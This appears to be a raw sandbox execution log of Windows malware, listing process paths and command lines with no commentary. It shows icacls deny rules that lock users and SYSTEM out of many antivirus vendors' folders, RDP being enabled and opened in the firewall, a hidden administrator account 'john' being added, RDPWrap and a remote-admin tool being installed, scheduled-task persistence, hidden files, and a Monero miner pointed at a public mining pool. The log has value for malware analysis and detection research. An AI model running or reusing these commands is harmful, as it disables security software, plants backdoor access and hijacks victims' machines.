C:\Programdata\Windows\rutserv.exe
rutserv.exe /firewall
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
C:\Windows\SysWOW64\sc.exe
sc delete crmsvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete "windows node"
C:\Windows\SysWOW64\sc.exe
sc delete "windows node"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\ProgramData\Microsoft\Intel\winlog.exe
C:\ProgramData\Microsoft\Intel\winlog.exe -p123
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\programdata\microsoft\intel\winlogon.exe
"C:\programdata\microsoft\intel\winlogon.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\342A.tmp\342B.bat C:\programdata\microsoft\intel\winlogon.exe"
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Programdata\Windows\rutserv.exe
rutserv.exe /start
C:\Programdata\Windows\rutserv.exe
C:\Programdata\Windows\rutserv.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\olly.exe /deny %username%:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\Iostream.exe /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\ProgramData\olly.exe /deny Admin:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\ProgramData\Iostream.exe /deny Admin:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\SystemIdle.exe /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\ProgramData\SystemIdle.exe /deny Admin:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Bot.exe /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Bot.exe /deny Admin:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\winhost.exe /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\winhost.exe /deny Admin:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Nvidiadriver.exe /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Nvidiadriver.exe /deny Admin:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe /deny Admin:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
C:\ProgramData\Microsoft\Intel\Vega.exe
C:\ProgramData\Microsoft\Intel\Vega.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\ProgramData\Microsoft\Intel\Vegas.sfx.exe
C:\ProgramData\Microsoft\Intel\Vegas.sfx.exe -p123
C:\Programdata\Windows\rfusclient.exe
C:\Programdata\Windows\rfusclient.exe
C:\Programdata\Windows\rfusclient.exe
C:\Programdata\Windows\rfusclient.exe /tray
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
C:\programdata\microsoft\intel\Vegas.exe
"C:\programdata\microsoft\intel\Vegas.exe"
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows\*.*
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3FAF.tmp\3FB0.bat C:\programdata\microsoft\intel\Vegas.exe"
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\rdp\Rar.exe
"Rar.exe" e -p555 db.rar
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2496426321559715893-715383930173903797410824589371338692808-14165336261723546714"
C:\Windows\system32\takeown.exe
takeown /f c:\windows\system32\systemreset.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1125104392467479991220759687-2797904912987947706776747891109717815890614367"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
C:\programdata\microsoft\intel\MOS.exe
C:\programdata\microsoft\intel\MOS.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls c:\windows\system32\systemreset.exe /setowner Admin
C:\Users\Admin\AppData\Local\Temp\RarSFX0\M.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\M.exe"
C:\Windows\system32\icacls.exe
icacls "c:\windows\system32\systemreset.exe" /grant:r Admin:F
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\R.vbs"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Programdata\Microsoft\Intel\OS.bat" "
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
\??\c:\Programdata\Microsoft\Intel\Cheat64.exe
"c:\Programdata\Microsoft\Intel\Cheat64.exe" /qn
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\rdp\bat.bat" "
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\programdata\microsoft\temp\H.bat
C:\Windows\SysWOW64\net.exe
net.exe user "john" "12345" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "john" "12345" /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" "John" /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" "John" /add
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -i -o
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "12878957941458200652-1133000543830729389-57444967717600126641742447826859681209"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\ProgramData\RealtekHD\taskhostw.exe
C:\ProgramData\RealtekHD\taskhostw.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\programdata\microsoft\temp\Temp.bat
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 5 /NOBREAK
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Programdata\Windows\rfusclient.exe
C:\Programdata\Windows\rfusclient.exe /tray
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-831351801593215769-1523285861692278870-18790582-1436941666-1223322341-889191422"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-7984462611013141898417820357591906659118825637990149113821619294987609138"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1017276001-12350836638276092552594315952141084285-465710304-998224870-863252447"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-400640227197694249-1869667779-141413013-3596850921438556474-1057006139821011440"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Package Cache" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Package Cache" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Package Cache" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Package Cache" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig /flushdns
C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Programdata\Install\del.bat
C:\Windows\SysWOW64\timeout.exe
timeout 5
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c gpupdate /force
C:\Windows\system32\gpupdate.exe
gpupdate /force
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
C:\ProgramData\WindowsTask\AppHost.exe
C:\ProgramData\WindowsTask\AppHost.exe -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] --donate-level=1 -p x -t4
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\xmr64 /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\xmr64 /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\windowsnode /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\windowsnode /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\GOOGLE /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\syswow64\xmr64 /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\hhsm /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\hhsm /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8} /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\Cefunpacked /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\windowsnode /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\syswow64\xmr64 /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\windowsnode /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\GOOGLE /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\syswow64\hhsm /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\hhsm /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8} /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\Cefunpacked /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\prefssecure /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\MicrosoftCorporation /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\prefssecure /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\tiser /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\MicrosoftCorporation /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls D:\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\tiser /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls E:\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls D:\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls E:\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls K:\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls K:\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\disk /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Logs /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\windows\min /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\disk /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\hs_module /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\oracle /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Logs /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\WindowsSQL /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM 1.exe /T /F
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\hs_module /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\windows\min /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\oracle /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\WindowsSQL /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM P.exe /T /F
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\DirectX11b /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Framework /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\system32 /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Framework /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\DirectX11b /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\AudioHDriver /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\windowsdriver /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\system32 /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\WindowsDefender /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\DriversI /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\windowsdriver /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\AudioHDriver /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\system32\hs /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\rss /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\DriversI /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\system32\hs /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\rss /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\WindowsDefender /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\generictools /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
